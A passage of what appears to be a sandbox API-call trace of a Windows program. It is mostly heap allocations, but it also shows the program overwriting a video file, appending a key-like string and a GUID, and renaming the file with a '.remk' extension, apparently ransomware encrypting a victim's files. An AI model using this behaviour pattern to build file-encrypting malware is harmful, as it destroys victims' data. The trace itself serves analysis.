hHeap=0x630000) returned 1 [0237.036] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc990 | out: hHeap=0x630000) returned 1 [0237.036] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0237.036] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc978 | out: hHeap=0x630000) returned 1 [0237.036] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0237.036] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0237.036] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc9d8 | out: hHeap=0x630000) returned 1 [0237.036] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0237.036] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6930 | out: hHeap=0x630000) returned 1 [0237.036] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1db0 | out: hHeap=0x630000) returned 1 [0237.036] GetCurrentThreadId () returned 0x314 [0237.036] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31c0f10 [0237.036] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x37c67a0 [0237.036] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x31a8ac8 [0237.036] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694f48 [0237.036] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x37bddc8 [0237.036] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0237.036] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fea0 [0237.036] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3192918 [0237.036] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0237.036] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0237.036] GetCurrentThreadId () returned 0x314 [0237.036] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0237.037] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0237.037] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x65dd10 [0237.037] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0237.037] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0237.037] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0237.037] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0237.037] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0237.037] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x65dd10 [0237.037] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0237.037] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x31b5808 [0237.037] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0237.037] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3195950 [0237.037] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0237.037] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc9d8 [0237.037] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0237.037] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0237.037] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0237.037] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed18 [0237.037] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed28 [0237.037] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f758 [0237.037] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f768 [0237.037] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f778 [0237.037] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc978 [0237.038] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0237.038] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72feb0 [0237.038] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0237.038] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0237.038] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f788 [0237.038] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f798 [0237.038] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f7a8 [0237.038] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc990 [0237.038] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f798 | out: hHeap=0x630000) returned 1 [0237.038] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ee8 [0237.038] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f788 | out: hHeap=0x630000) returned 1 [0237.038] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc960 [0237.038] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f7a8 | out: hHeap=0x630000) returned 1 [0237.038] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc9f0 [0237.038] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0237.038] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fec0 [0237.038] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f768 | out: hHeap=0x630000) returned 1 [0237.038] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc9c0 [0237.038] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0237.038] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc9a8 [0237.038] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0237.038] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bca08 [0237.038] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc9a8 | out: hHeap=0x630000) returned 1 [0237.038] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bc9a8 [0237.039] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc9c0 | out: hHeap=0x630000) returned 1 [0237.039] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x68ed18 [0237.039] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0237.039] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ea8 [0237.039] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0237.039] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ec8 [0237.039] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc978 | out: hHeap=0x630000) returned 1 [0237.039] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc978 [0237.039] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0237.039] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x325fd48 [0237.039] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc9d8 | out: hHeap=0x630000) returned 1 [0237.039] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6c48 [0237.039] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bca08 | out: hHeap=0x630000) returned 1 [0237.039] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x37b5b70 [0237.039] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ec8 | out: hHeap=0x630000) returned 1 [0237.039] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x72aea0 [0237.039] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0237.039] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6d60 [0237.039] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc978 | out: hHeap=0x630000) returned 1 [0237.039] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x37b5d88 [0237.039] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6c48 | out: hHeap=0x630000) returned 1 [0237.040] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x319bc40 [0237.040] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0237.040] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694f48 | out: hHeap=0x630000) returned 1 [0237.040] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0237.040] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x319bc40 | out: hHeap=0x630000) returned 1 [0237.040] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ea8 | out: hHeap=0x630000) returned 1 [0237.040] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6d60 | out: hHeap=0x630000) returned 1 [0237.040] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0237.040] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5d88 | out: hHeap=0x630000) returned 1 [0237.040] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72aea0 | out: hHeap=0x630000) returned 1 [0237.040] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f758 | out: hHeap=0x630000) returned 1 [0237.040] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc9a8 | out: hHeap=0x630000) returned 1 [0237.040] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f778 | out: hHeap=0x630000) returned 1 [0237.040] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc9f0 | out: hHeap=0x630000) returned 1 [0237.040] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0237.040] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc990 | out: hHeap=0x630000) returned 1 [0237.040] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc960 | out: hHeap=0x630000) returned 1 [0237.040] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bddc8 | out: hHeap=0x630000) returned 1 [0237.040] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8ac8 | out: hHeap=0x630000) returned 1 [0237.040] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3192918 | out: hHeap=0x630000) returned 1 [0237.040] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc948 | out: hHeap=0x630000) returned 1 [0237.040] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37cf1c8 | out: hHeap=0x630000) returned 1 [0237.040] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fd48 | out: hHeap=0x630000) returned 1 [0237.040] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3195950 | out: hHeap=0x630000) returned 1 [0237.040] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5808 | out: hHeap=0x630000) returned 1 [0237.041] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6b30 | out: hHeap=0x630000) returned 1 [0237.041] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f08 | out: hHeap=0x630000) returned 1 [0237.041] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0237.041] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0237.041] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6990 | out: hHeap=0x630000) returned 1 [0237.041] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0237.041] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0237.041] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0237.041] WriteFile (in: hFile=0x640, lpBuffer=0x37cf820*, nNumberOfBytesToWrite=0xacc9, lpNumberOfBytesWritten=0x3adfb14, lpOverlapped=0x0 | out: lpBuffer=0x37cf820*, lpNumberOfBytesWritten=0x3adfb14*=0xacc9, lpOverlapped=0x0) returned 1 [0237.041] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37cf820 | out: hHeap=0x630000) returned 1 [0237.041] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0xacce, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.041] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0237.042] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0237.042] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0237.042] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x325fb40 [0237.042] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", cchWideChar=-1, lpMultiByteStr=0x325fb40, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", lpUsedDefaultChar=0x0) returned 41 [0237.042] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x37b5b70 [0237.042] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0237.042] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711a38 | out: hHeap=0x630000) returned 1 [0237.042] WriteFile (in: hFile=0x640, lpBuffer=0x37b5b70*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x37b5b70*, lpNumberOfBytesWritten=0x3adfb50*=0x28, lpOverlapped=0x0) returned 1 [0237.042] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0237.042] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0237.042] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0237.042] CloseHandle (hObject=0x640) returned 1 [0237.047] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xb0) returned 0x3186340 [0237.047] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8c0) returned 0x37bd408 [0237.047] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3186340 | out: hHeap=0x630000) returned 1 [0237.047] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\CSFg h-wcbKcac\\_2KhhEZ4Uf5pHRY\\sSO7KsP.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\pcpks0u\\csfg h-wcbkcac\\_2khhez4uf5phry\\sso7ksp.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\CSFg h-wcbKcac\\_2KhhEZ4Uf5pHRY\\sSO7KsP.avi.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\pcpks0u\\csfg h-wcbkcac\\_2khhez4uf5phry\\sso7ksp.avi.remk")) returned 1 [0237.048] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bd408 | out: hHeap=0x630000) returned 1 [0237.048] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0237.048] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0237.049] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0237.050] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0948530, ftCreationTime.dwHighDateTime=0x1d5da79, ftLastAccessTime.dwLowDateTime=0x7ed331d0, ftLastAccessTime.dwHighDateTime=0x1d5e1e8, ftLastWriteTime.dwLowDateTime=0x7ed331d0, ftLastWriteTime.dwHighDateTime=0x1d5e1e8, nFileSizeHigh=0x0, nFileSizeLow=0xacce, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sSO7KsP.avi", cAlternateFileName="")) returned 0 [0237.050] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0237.050] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a20 | out: hHeap=0x630000) returned 1 [0237.050] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6420 | out: hHeap=0x630000) returned 1 [0237.050] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0237.050] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694398 | out: hHeap=0x630000) returned 1 [0237.050] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e730 | out: hHeap=0x630000) returned 1 [0237.050] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6618 | out: hHeap=0x630000) returned 1 [0237.050] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695278 | out: hHeap=0x630000) returned 1 [0237.050] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e8f8 | out: hHeap=0x630000) returned 1 [0237.050] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65eac0 | out: hHeap=0x630000) returned 1 [0237.050] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65ea28 | out: hHeap=0x630000) returned 1 [0237.050] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6810 | out: hHeap=0x630000) returned 1 [0237.050] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694fd0 | out: hHeap=0x630000) returned 1 [0237.051] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3185c10 | out: hHeap=0x630000) returned 1 [0237.051] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c7a68 | out: hHeap=0x630000) returned 1 [0237.051] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3185cc8 | out: hHeap=0x630000) returned 1 [0237.051] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3185fa8 | out: hHeap=0x630000) returned 1 [0237.051] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c79a0 | out: hHeap=0x630000) returned 1 [0237.051] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e7c8 | out: hHeap=0x630000) returned 1 [0237.051] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b66c0 | out: hHeap=0x630000) returned 1 [0237.051] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e860 | out: hHeap=0x630000) returned 1 [0237.051] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b68b8 | out: hHeap=0x630000) returned 1 [0237.051] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1b88 | out: hHeap=0x630000) returned 1 [0237.051] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e860 [0237.051] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0237.051] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e7c8 [0237.051] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0237.051] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0237.051] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e7c8 | out: hHeap=0x630000) returned 1 [0237.051] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e7c8 [0237.051] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0237.051] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0237.051] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e7c8 | out: hHeap=0x630000) returned 1 [0237.051] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e7c8 [0237.051] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0237.051] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0237.052] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e7c8 | out: hHeap=0x630000) returned 1 [0237.052] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e7c8 [0237.052] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0237.052] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0237.052] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e7c8 | out: hHeap=0x630000) returned 1 [0237.052] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e7c8 [0237.052] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0237.052] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0237.052] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e7c8 | out: hHeap=0x630000) returned 1 [0237.052] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e7c8 [0237.052] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0237.052] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0237.052] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e7c8 | out: hHeap=0x630000) returned 1 [0237.052] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e7c8 [0237.052] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0237.052] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x37bfdb0 [0237.052] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0237.052] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bfdb0 | out: hHeap=0x630000) returned 1 [0237.052] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e7c8 | out: hHeap=0x630000) returned 1 [0237.052] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e7c8 [0237.052] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0237.052] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0237.052] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e7c8 | out: hHeap=0x630000) returned 1 [0237.053] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e7c8 [0237.053] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0237.053] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0237.053] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e7c8 | out: hHeap=0x630000) returned 1 [0237.053] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e7c8 [0237.053] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0237.053] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0237.053] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e7c8 | out: hHeap=0x630000) returned 1 [0237.053] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e7c8 [0237.053] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0237.053] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0237.053] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e7c8 | out: hHeap=0x630000) returned 1 [0237.053] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e7c8 [0237.053] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0237.053] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0237.054] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\") returned="10.0\\" [0237.054] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694fd0 [0237.054] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\") returned="Acrobat\\" [0237.054] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0237.054] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x31b3d60 [0237.054] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0237.054] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0237.054] 